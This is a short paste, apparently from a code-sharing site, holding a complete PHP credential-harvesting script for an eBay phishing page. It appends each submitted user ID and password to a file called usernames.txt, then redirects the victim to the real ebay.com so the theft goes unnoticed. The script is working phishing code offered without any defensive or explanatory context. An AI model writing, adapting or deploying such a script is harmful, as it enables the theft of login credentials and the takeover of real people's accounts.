Untitled
3 years ago in Plain Text
<?php
file_put_contents("usernames.txt", "Account: " . $_POST['userid'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://ebay.com');
exit();